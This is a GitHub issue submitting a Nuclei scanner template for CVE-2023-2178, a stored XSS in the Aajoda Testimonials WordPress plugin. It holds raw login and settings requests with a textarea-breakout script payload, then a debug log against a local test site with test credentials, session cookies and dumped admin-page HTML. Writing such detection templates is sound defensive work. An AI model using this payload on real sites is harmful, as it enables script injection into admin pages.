Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[nuclei-template] #7750

Closed
muhamedfarish opened this issue Jul 24, 2023 · 2 comments · Fixed by #7760
Closed

[nuclei-template] #7750

muhamedfarish opened this issue Jul 24, 2023 · 2 comments · Fixed by #7760
Assignees
@ritikchaddha
Labels
Done Ready to merge good first issue Good for newcomers nuclei-template Nuclei template contribution

Comments

@muhamedfarish
Copy link

Template Information:

Nuclei Template:

`id: CVE-2023-2178
info:
name: Aajoda Testimonials < 2.2.2 - Admin+ Stored XSS
author: Farish
severity: Medium
description: |
The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
reference:
- https://wpscan.com/vulnerability/e84b71f9-4208-4efb-90e8-1c778e7d2ebb
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
tags: wpscan,cwe-79,stored xss,wordpress,CVE-2023-2178

http:

  • raw:

    • |
      POST /wp-login.php HTTP/1.1
      Host: {{Hostname}}
      Content-Type: application/x-www-form-urlencoded

      log={{username}}&pwd={{password}}&wp-submit=Log+In

    • |
      POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1
      Host: {{Hostname}}

      aajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2Ftemplate+by+farish%2F%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save

    cookie-reuse: true
    matchers:

    • type: dsl
      dsl:
      • 'status_code_2 == 200'
      • 'contains(all_headers_2, "text/html")'
      • 'contains(body_2, ""></textarea><script>alert(/template by farish/)</script>")'
        condition: and

`
Debug result:

POST /wp-login.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

log=admin&pwd=admin@123&wp-submit=Log+In
[DBG] [CVE-2023-2178] Dumped HTTP response http://localhost:8080/wp-login.php

HTTP/1.1 302 Found
Connection: close
Content-Length: 0
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jul 2023 08:08:48 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Location: http://localhost:8080/wp-admin/
Pragma: no-cache
Server: Apache/2.4.56 (Debian)
Set-Cookie: PHPSESSID=f3e5187bd6faf7ec1b01386487f5e308; path=/
Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/
Set-Cookie: wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1690358929%7CnOLqkIcK41Z4ce2fJ8RRVgdnquYJtAo3LRmuR0Rv6Lx%7Ccee2c44af0f4f9c3db2abeebdfb2734f07416c231ca99c8437098e71c8d3e722; path=/wp-content/plugins; HttpOnly
Set-Cookie: wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1690358929%7CnOLqkIcK41Z4ce2fJ8RRVgdnquYJtAo3LRmuR0Rv6Lx%7Ccee2c44af0f4f9c3db2abeebdfb2734f07416c231ca99c8437098e71c8d3e722; path=/wp-admin; HttpOnly
Set-Cookie: wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1690358929%7CnOLqkIcK41Z4ce2fJ8RRVgdnquYJtAo3LRmuR0Rv6Lx%7C0d16602903b5aa8f7671467f5981a4c74cb367edadf9b2fda02cebdf87f2de43; path=/; HttpOnly
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.0.29
X-Redirect-By: WordPress

[INF] [CVE-2023-2178] Dumped HTTP request for http://localhost:8080/wp-admin/options-general.php?page=aajoda-testimonials

POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 192
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1690358929%7CnOLqkIcK41Z4ce2fJ8RRVgdnquYJtAo3LRmuR0Rv6Lx%7Ccee2c44af0f4f9c3db2abeebdfb2734f07416c231ca99c8437098e71c8d3e722; PHPSESSID=f3e5187bd6faf7ec1b01386487f5e308; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1690358929%7CnOLqkIcK41Z4ce2fJ8RRVgdnquYJtAo3LRmuR0Rv6Lx%7C0d16602903b5aa8f7671467f5981a4c74cb367edadf9b2fda02cebdf87f2de43
Accept-Encoding: gzip

aajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2Ftemplate+by+farish%2F%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save
[DBG] [CVE-2023-2178] Dumped HTTP response http://localhost:8080/wp-admin/options-general.php?page=aajoda-testimonials

HTTP/1.1 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jul 2023 08:08:49 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Referrer-Policy: strict-origin-when-cross-origin
Server: Apache/2.4.56 (Debian)
Set-Cookie: wp-settings-1=libraryContent%3Dbrowse; expires=Tue, 23-Jul-2024 08:08:49 GMT; Max-Age=31536000; path=/
Set-Cookie: wp-settings-time-1=1690186129; expires=Tue, 23-Jul-2024 08:08:49 GMT; Max-Age=31536000; path=/
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.0.29

<title> ‹ admin — WordPress</title> <script type="text/javascript"> addLoadEvent = function(func){if(typeof jQuery!=='undefined')jQuery(function(){func();});else if(typeof wpOnload!=='function'){wpOnload=func;}else{var oldonload=wpOnload;wpOnload=function(){oldonload();func();}}}; var ajaxurl = '/wp-admin/admin-ajax.php', pagenow = 'toplevel_page_aajoda-testimonials', typenow = '', adminpage = 'toplevel_page_aajoda-testimonials', thousandsSeparator = ',', decimalPoint = '.', isRtl = 0; </script> <style> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <style type="text/css">div.rn-alert{padding:15px 35px 15px 15px;margin-bottom:20px;border:1px solid transparent;-webkit-box-shadow:none;box-shadow:none}div.rn-alert p:empty{display:none}div.rn-alert ol,div.rn-alert ol li,div.rn-alert ul,div.rn-alert ul li{list-style:inherit!important}div.rn-alert ol,div.rn-alert ul{padding-left:30px}div.rn-alert hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0;margin-top:20px;margin-bottom:20px;border:0;border-top:1px solid #eee}div.rn-alert h1,h2,h3,h4,h5,h6{margin-top:0;color:inherit}div.rn-alert a{font-weight:700}div.rn-alert a:hover{text-decoration:underline}div.rn-alert>p{margin:0;padding:0;line-height:1}div.rn-alert>p,div.rn-alert>ul{margin-bottom:0}div.rn-alert>p+p{margin-top:5px}div.rn-alert .rn-dismiss-btn{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;position:relative;top:-2px;right:-21px;padding:0;cursor:pointer;background:0;border:0;-webkit-appearance:none;float:right;font-size:21px;font-weight:700;line-height:1;color:#000;text-shadow:0 1px 0 #fff;opacity:.2;filter:alpha(opacity=20);text-decoration:none}div.rn-alert-success{background-color:#dff0d8;border-color:#d6e9c6;color:#3c763d}div.rn-alert-success hr{border-top-color:#c9e2b3}div.rn-alert-success a{color:#2b542c}div.rn-alert-info{background-color:#d9edf7;border-color:#bce8f1;color:#31708f}div.rn-alert-info hr{border-top-color:#a6e1ec}div.rn-alert-info a{color:#245269}div.rn-alert-warning{background-color:#fcf8e3;border-color:#faebcc;color:#8a6d3b}div.rn-alert-warning hr{border-top-color:#f7e1b5}div.rn-alert-warning a{color:#66512c}div.rn-alert-danger{background-color:#f2dede;border-color:#ebccd1;color:#a94442}div.rn-alert-danger hr{border-top-color:#e4b9c0}div.rn-alert-danger a{color:#843534}</style> <script> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/localhost:8080\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.2.2"}}; /*! This file is auto-generated */ !function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){p.clearRect(0,0,i.width,i.height),p.fillText(e,0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(t,0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r <script> /* */ </script> <script src='http://localhost:8080/wp-admin/load-scripts.php?c=1&load%5Bchunk_0%5D=jquery-core,jquery-migrate,utils,wp-polyfill-inert,regenerator-runtime,wp-polyfill,wp-hooks&ver=6.2.2'></script> <script src='http://localhost:8080/wp-includes/js/dist/i18n.min.js?ver=9e794f35a71bb98672ae' id='wp-i18n-js'></script> <script id='wp-i18n-js-after'> wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } ); </script> <script id='wpas-admin-wizard-script-js-extra'> var WPAS_Wizard = {"ajax_url":"http:\/\/localhost:8080\/wp-admin\/admin-ajax.php","about_page":"http:\/\/localhost:8080\/wp-admin\/edit.php?post_type=ticket&page=wpas-about"}; </script> <script src='http://localhost:8080/wp-content/plugins/awesome-support/assets/admin/js/admin-wizard.js?ver=6.0.10' id='wpas-admin-wizard-script-js'></script> <script id='wpas-admin-print-ticket-js-extra'> var WPAS_Print = {"admin_url":"http:\/\/localhost:8080\/wp-admin\/","plugin_url":"http:\/\/localhost:8080\/wp-content\/plugins\/awesome-support\/","nonce":"bfb6a63617","print":"Print","cancel":"Cancel","print_ticket":"Print ticket","print_tickets":"Print tickets","include_replies":"Include replies","include_history":"Include history","include_private_notes":"Include private notes"}; </script> <script src='http://localhost:8080/wp-content/plugins/awesome-support/assets/admin/js/admin-print-ticket.js?ver=6.0.10' id='wpas-admin-print-ticket-js'></script> <script id='wpas-gdpr-admin-script-js-extra'> var WPAS_GDPR = {"ajax_url":"http:\/\/localhost:8080\/wp-admin\/admin-ajax.php","nonce":"4400f91509"}; </script> <script src='http://localhost:8080/wp-content/plugins/awesome-support/assets/admin/js/admin-gdpr.js?ver=6.0.10' id='wpas-gdpr-admin-script-js'></script> <script src='http://localhost:8080/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2' id='jquery-ui-core-js'></script> <script src='http://localhost:8080/wp-includes/js/jquery/ui/mouse.min.js?ver=1.13.2' id='jquery-ui-mouse-js'></script> <script src='http://localhost:8080/wp-includes/js/jquery/ui/slider.min.js?ver=1.13.2' id='jquery-ui-slider-js'></script> <script src='http://localhost:8080/wp-includes/js/jquery/ui/draggable.min.js?ver=1.13.2' id='jquery-ui-draggable-js'></script> <script src='http://localhost:8080/wp-includes/js/jquery/jquery.ui.touch-punch.js?ver=0.2.2' id='jquery-touch-punch-js'></script> <script src='http://localhost:8080/wp-admin/js/iris.min.js?ver=1.1.1' id='iris-js'></script> <script id='wp-color-picker-js-extra'> var wpColorPickerL10n = {"clear":"Clear","clearAriaLabel":"Clear color","defaultString":"Default","defaultAriaLabel":"Select default color","pick":"Select Color","defaultLabel":"Color value"}; </script> <script src='http://localhost:8080/wp-admin/js/color-picker.min.js?ver=6.2.2' id='wp-color-picker-js'></script> <script src='http://localhost:8080/wp-content/plugins/awesome-support/vendor/gambitph/titan-framework/js/min/wp-color-picker-alpha-min.js?ver=1.12.1' id='wp-color-picker-alpha-js'></script> <style>#wpadminbar #wp-admin-bar-wpas_tickets .ab-icon:before { content: '\f468'; top: 2px; }</style> <script> 
	jQuery( document ).ready( function () {
		'use strict';

		/**
		 * Select2
		 * @see https://select2.github.io/
		 */
		if ( jQuery().select2 ) {
			jQuery( 'select.tf-select, [class*="tf-select"] select' ).select2();
		}
	});
	</script>
			<script>
	jQuery(document).ready(function($) {
		'use strict';

		$( '.tf-number input[type=number]' ).each(function() {
			if ( ! $( this ).prev().is( '.number-slider' ) ) {
				return;
			}
			$( this ).prev().slider( {
				max: Number( $( this ).attr('max') ),
				min: Number( $( this ).attr('min') ),
				step: Number( $( this ).attr('step') ),
				value: Number( $( this ).val() ),
				animate: 'fast',
				change: function( event, ui ) {
					var input = $( ui.handle ).parent().next();
					if ( ui.value !== input.val() ) {
						input.val( ui.value ).trigger( 'change' );
					}
				},
				slide: function( event, ui ) {
					var input = $( ui.handle ).parent().next();
					if ( ui.value !== input.val() ) {
						input.val( ui.value ).trigger( 'change' );
					}
				}
			} ).disableSelection();
		} );

		// Returns a function, that, as long as it continues to be invoked, will not
		// be triggered. The function will be called after it stops being called for
		// N milliseconds. If `immediate` is passed, trigger the function on the
		// leading edge, instead of the trailing.
		function debounce(func, wait, immediate) {
			var timeout;
			return function() {
				var context = this, args = arguments;
				var later = function() {
					timeout = null;
					if (!immediate) func.apply(context, args);
				};
				var callNow = immediate && !timeout;
				clearTimeout(timeout);
				timeout = setTimeout(later, wait);
				if (callNow) func.apply(context, args);
			};
		};

		$( '.tf-number input[type=number]' ).on( 'keyup', debounce( function() {
			if ( $( this ).prev().slider( 'value' ).toString() !== $( this ).val().toString() ) {
				$( this ).prev().slider( 'value', $( this ).val() );
			}
		}, 500 ) );
	});
	</script>
	<script type="text/javascript">var _wpColorScheme = {"icons":{"base":"#a7aaad","focus":"#72aee6","current":"#fff"}};</script>
<link id="wp-admin-canonical" rel="canonical" href="http://localhost:8080/wp-admin/options-general.php?page=aajoda-testimonials" />
<script>
	if ( window.history.replaceState ) {
		window.history.replaceState( null, null, document.getElementById( 'wp-admin-canonical' ).href + window.location.hash );
	}
</script>
<meta name="viewport" content="width=device-width,initial-scale=1.0"><style media="print">#wpadminbar { display:none; }</style>
</head>
<script type="text/javascript"> document.body.className = document.body.className.replace('no-js','js'); </script> 
<script>
	(function() {
		var request, b = document.body, c = 'className', cs = 'customize-support', rcs = new RegExp('(^|\\s+)(no-)?'+cs+'(\\s+|$)');

			request = true;

		b[c] = b[c].replace( rcs, ' ' );
		// The customizer requires postMessage and CORS (if the site is cross domain).
		b[c] += ( window.postMessage && request ? ' ' : ' no-' ) + cs;
	}());
</script>
Skip to main content Skip to toolbar 
    <li class="wp-first-item wp-has-submenu wp-not-current-submenu menu-top menu-top-first menu-icon-dashboard menu-top-last" id="menu-dashboard">
<a href='index.php' class="wp-first-item wp-has-submenu wp-not-current-submenu menu-top menu-top-first menu-icon-dashboard menu-top-last" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-dashboard' aria-hidden='true'><br /></div><div class='wp-menu-name'>Dashboard</div></a>
<ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Dashboard</li><li class="wp-first-item"><a href='index.php' class="wp-first-item">Home</a></li><li><a href='update-core.php'>Updates <span class="update-plugins count-7"><span class="update-count">7</span></span></a></li><li><a href='as-setup'></a></li></ul></li>
<li class="wp-not-current-submenu wp-menu-separator" aria-hidden="true"><div class="separator"></div></li>
<li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-post open-if-no-js menu-top-first" id="menu-posts">
<a href='edit.php' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-post open-if-no-js menu-top-first" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-post' aria-hidden='true'><br /></div><div class='wp-menu-name'>Posts</div></a>
<ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Posts</li><li class="wp-first-item"><a href='edit.php' class="wp-first-item">All Posts</a></li><li><a href='post-new.php'>Add New</a></li><li><a href='edit-tags.php?taxonomy=category'>Categories</a></li><li><a href='edit-tags.php?taxonomy=post_tag'>Tags</a></li></ul></li>
<li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-media" id="menu-media">
<a href='upload.php' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-media" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-media' aria-hidden='true'><br /></div><div class='wp-menu-name'>Media</div></a>
<ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Media</li><li class="wp-first-item"><a href='upload.php' class="wp-first-item">Library</a></li><li><a href='media-new.php'>Add New</a></li></ul></li>
<li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-page" id="menu-pages">
<a href='edit.php?post_type=page' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-page" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-page' aria-hidden='true'><br /></div><div class='wp-menu-name'>Pages</div></a>
<ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Pages</li><li class="wp-first-item"><a href='edit.php?post_type=page' class="wp-first-item">All Pages</a></li><li><a href='post-new.php?post_type=page'>Add New</a></li></ul></li>
<li class="wp-not-current-submenu menu-top menu-icon-comments" id="menu-comments">
<a href='edit-comments.php' class="wp-not-current-submenu menu-top menu-icon-comments" ><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-comments' aria-hidden='true'><br /></div><div class='wp-menu-name'>Comments <span class="awaiting-mod count-0"><span class="pending-count" aria-hidden="true">0</span><span class="comments-in-moderation-text screen-reader-text">0 Comments in moderation</span></span></div></a></li>
<li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-ticket" id="menu-posts-ticket">
<a href='edit.php?post_type=ticket' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-ticket" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-forms' aria-hidden='true'><br /></div><div class='wp-menu-name'>Tickets</div></a>
<ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Tickets</li><li class="wp-first-item"><a href='edit.php?post_type=ticket' class="wp-first-item">All Tickets</a></li><li><a href='post-new.php?post_type=ticket'>Add New</a></li><li><a href='edit-tags.php?taxonomy=ticket-tag&amp;post_type=ticket'>Tags</a></li><li><a href='edit-tags.php?taxonomy=ticket_channel&amp;post_type=ticket'>Channels</a></li><li><a href='edit.php?post_type=ticket&#038;page=wpas-settings'>Settings</a></li><li><a href='edit.php?post_type=ticket&#038;page=wpas-status'>Tools</a></li><li><a href='edit.php?post_type=ticket&#038;page=wpas-addons'><span style="color:#f39c12;">Addons</span></a></li><li><a href='edit.php?post_type=ticket&#038;page=wpas-optin'><span style="color:#f39c12;">Get a Free Addon!</span></a></li><li><a href='edit.php?post_type=ticket&#038;page=wpas-help-and-support'><span style="color:#4CBBA7;">Help &amp; Support</span></a></li><li><a href='edit.php?post_type=ticket&#038;page=wpas-about'>About</a></li></ul></li>
<li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-pets menu-top-last" id="menu-posts-pets">
<a href='edit.php?post_type=pets' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-pets menu-top-last" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image svg' style="background-image:url('data:image/svg+xml;base64,PHN2ZyB2ZXJzaW9uPSIxLjEiIGlkPSJFYmVuZV8xIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB4PSIwcHgiIHk9IjBweCINCgkgd2lkdGg9IjEwMHB4IiBoZWlnaHQ9IjEwMHB4IiB2aWV3Qm94PSIyMDAgMzIwIDIwMCAxMDAiPg0KPHBhdGggZmlsbC1ydWxlPSJldmVub2RkIiBjbGlwLXJ1bGU9ImV2ZW5vZGQiIGZpbGw9ImJsYWNrIiBkPSJNMjM2LjY0OSwzMTkuNjkzYzEuOTY4LTEuODc2LDQuNzU2LTMuODY5LDcuMDc1LTQuNDM3DQoJYzEzLjAxMS0zLjE5MSwzNi4zMzYsMjEuOTA0LDMwLjI2NCwzNy40ODZjLTEuMjc2LDMuMjcyLTQuOTU5LDYuNzgzLTkuODQzLDguMTNDMjQ5Ljg1MSwzNjQuODEzLDIyMi4yNDMsMzMzLjQyNCwyMzYuNjQ5LDMxOS42OTN6Ig0KCS8+DQo8cGF0aCBmaWxsLXJ1bGU9ImV2ZW5vZGQiIGNsaXAtcnVsZT0iZXZlbm9kZCIgZmlsbD0iYmxhY2siIGQ9Ik0yNzkuMTcsMjk3LjE0NGMyNC4zMDQtMTcuNzkyLDQwLjQxMiwzMC4wODQsMjUuNTAzLDQyLjIxOA0KCUMyODIuODY4LDM1Ny4xMDYsMjYzLjI2NiwzMDguNDE2LDI3OS4xNywyOTcuMTQ0eiIvPg0KPHBhdGggZmlsbC1ydWxlPSJldmVub2RkIiBjbGlwLXJ1bGU9ImV2ZW5vZGQiIGZpbGw9ImJsYWNrIiBkPSJNMjI1Ljc5MiwzNjUuMzcyYzEwLjExNi05LjcwNCwyNy41NTktMS4xMjcsMzQuMTEsOC44OTMNCgljNS4yNDksOC4wMjYsNS40MTUsMTguMjk1LTEuNTY5LDIyLjU3NWMtMTIuMjIzLDcuNDktMzUuMjgtNC43MS0zNi41NTMtMjEuNjU3QzIyMS41NjksMzcyLjM2MSwyMjMuMDI3LDM2OC4wMjIsMjI1Ljc5MiwzNjUuMzcyeiINCgkvPg0KPHBhdGggZmlsbC1ydWxlPSJldmVub2RkIiBjbGlwLXJ1bGU9ImV2ZW5vZGQiIGZpbGw9ImJsYWNrIiBkPSJNMzIzLjQ5OSwzMTQuNTEzYzE5LjgxOC0xNi40NzIsMjkuNTc0LDIwLjExMiwyMy4yNzUsMzIuNDM4DQoJYy0xLjk1NiwzLjgyNi03LjYzLDkuMjQyLTEyLjQ2LDEwLjAzMWMtMTMuODQzLDIuMjYzLTE5LjgxLTE5LjA5NS0xOC4xNzItMjkuNDM5QzMxNi43NjUsMzIzLjYwNywzMTguNzY5LDMxOC40NDQsMzIzLjQ5OSwzMTQuNTEzeg0KCSIvPg0KPHBhdGggZmlsbC1ydWxlPSJldmVub2RkIiBjbGlwLXJ1bGU9ImV2ZW5vZGQiIGZpbGw9ImJsYWNrIiBkPSJNMjg0Ljk1OCwzNjAuNDY3YzEuODYyLTEuMzE2LDguOTM1LTUuNTEzLDEzLjMwMi02LjEzOQ0KCWMxMi40NjItMS43ODQsMzYuMDk1LDUuNzE5LDQ3Ljg3OCwxNS41ODNjMTUuMjU3LDEyLjc3LDE1LjEwNywyNy4zNTMtMi41NzEsMzMuOTI4Yy05LjMxNywzLjQ2NS0xOC45ODksMS40NDktMjcuNzcsNS43MjkNCgljLTExLjI2Myw1LjQ5My0zNi4wMSw0NC41MTYtNDguMjEzLDE0Yy03LjI2MS0xOC4xNTgsMS43NDMtNDcuNTM5LDEwLjk0NS01OC4xNjJDMjc5LjkxMiwzNjMuODEyLDI4Mi43MjUsMzYyLjA0NSwyODQuOTU4LDM2MC40Njd6DQoJIi8+DQo8cGF0aCBmaWxsLXJ1bGU9ImV2ZW5vZGQiIGNsaXAtcnVsZT0iZXZlbm9kZCIgZmlsbD0iYmxhY2siIGQ9Ik0zMDguODU4LDQyNC45NDZjMi4xNTEsNC4xMjksNC4zMDQsOC4yNTgsNi40NTYsMTIuMzg4DQoJYy0zLjk3NiwxLjY2Ny04LjU4Niw1LjM0NC0xMi4xMDUsNS41NTljLTEuNjY3LTMuOTc2LTUuMzQ0LTguNTg1LTUuNTU5LTEyLjEwNUMzMDEuMzg3LDQyOC44MzksMzA1LjEyMiw0MjYuODkyLDMwOC44NTgsNDI0Ljk0NnoiDQoJLz4NCjxwYXRoIGZpbGwtcnVsZT0iZXZlbm9kZCIgY2xpcC1ydWxlPSJldmVub2RkIiBmaWxsPSJibGFjayIgZD0iTTMzMy42NTQsNDEyLjA3MWMzLjczNi0xLjk0Nyw3LjQ3MS0zLjg5NCwxMS4yMDgtNS44NDENCgljMi44NjksMi4zNzQsNC42MzcsOC4yNDgsNy4wNDcsMTIuMDgxYy0zLjkzMywyLjA0OS03Ljg2NSw0LjA5OS0xMS43OTksNi4xNDlDMzM3Ljk1OCw0MjAuMzMsMzM1LjgwNyw0MTYuMiwzMzMuNjU0LDQxMi4wNzF6Ii8+DQo8L3N2Zz4NCg==')" aria-hidden='true'><br /></div><div class='wp-menu-name'>Pets</div></a>
<ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Pets</li><li class="wp-first-item"><a href='edit.php?post_type=pets' class="wp-first-item">All Pets</a></li><li><a href='post-new.php?post_type=pets'>Add New</a></li><li><a href='edit-tags.php?taxonomy=breed&amp;post_type=pets'>Breed</a></li><li><a href='edit-tags.php?taxonomy=pet-color&amp;post_type=pets'>Colors</a></li><li><a href='edit-tags.php?taxonomy=sponsors&amp;post_type=pets'>Sponsors</a></li><li><a href='edit-tags.php?taxonomy=pet-locations&amp;post_type=pets'>Locations</a></li><li><a href='edit.php?post_type=pets&#038;page=pets-settings'>Settings</a></li><li><a href='edit.php?post_type=pets&#038;page=pets-fields'>Fields</a></li><li><a href='edit.php?post_type=pets&#038;page=pets-pricing'><span class="fs-submenu-item pets pricing upgrade-mode">Upgrade&nbsp;&nbsp;&#x27a4;</span></a></li></ul></li>
<li class="wp-not-current-submenu wp-menu-separator" aria-hidden="true"><div class="separator"></div></li>
<li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-appearance menu-top-first" id="menu-appearance">
<a href='themes.php' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-appearance menu-top-first" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-appearance' aria-hidden='true'><br /></div><div class='wp-menu-name'>Appearance</div></a>
<ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Appearance</li><li class="wp-first-item"><a href='themes.php' class="wp-first-item">Themes <span class="update-plugins count-0"><span class="theme-count">0</span></span></a></li><li><a href='site-editor.php'>Editor</a></li><li class="hide-if-no-customize"><a href='customize.php?return=%2Fwp-admin%2Foptions-general.php%3Fpage%3Daajoda-testimonials' class="hide-if-no-customize">Customize</a></li></ul></li>
<li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-plugins" id="menu-plugins">
<a href='plugins.php' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-plugins" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-plugins' aria-hidden='true'><br /></div><div class='wp-menu-name'>Plugins <span class="update-plugins count-7"><span class="plugin-count">7</span></span></div></a>
<ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Plugins <span class="update-plugins count-7"><span class="plugin-count">7</span></span></li><li class="wp-first-item"><a href='plugins.php' class="wp-first-item">Installed Plugins</a></li><li><a href='plugin-install.php'>Add New</a></li></ul></li>
<li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-users" id="menu-users">
<a href='users.php' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-users" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-users' aria-hidden='true'><br /></div><div class='wp-menu-name'>Users</div></a>
<ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Users</li><li class="wp-first-item"><a href='users.php' class="wp-first-item">All Users</a></li><li><a href='user-new.php'>Add New</a></li><li><a href='profile.php'>Profile</a></li></ul></li>
<li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-tools" id="menu-tools">
<a href='tools.php' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-tools" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-tools' aria-hidden='true'><br /></div><div class='wp-menu-name'>Tools</div></a>
<ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Tools</li><li class="wp-first-item"><a href='tools.php' class="wp-first-item">Available Tools</a></li><li><a href='import.php'>Import</a></li><li><a href='export.php'>Export</a></li><li><a href='site-health.php'>Site Health <span class="menu-counter site-health-counter count-0"><span class="count">0</span></span></a></li><li><a href='export-personal-data.php'>Export Personal Data</a></li><li><a href='erase-personal-data.php'>Erase Personal Data</a></li><li><a href='tools.php?page=csg-sitemap'>Sitemap</a></li><li><a href='theme-editor.php'>Theme File Editor</a></li><li><a href='plugin-editor.php'>Plugin File Editor</a></li></ul></li>
<li class="wp-has-submenu wp-has-current-submenu wp-menu-open menu-top menu-icon-settings" id="menu-settings">
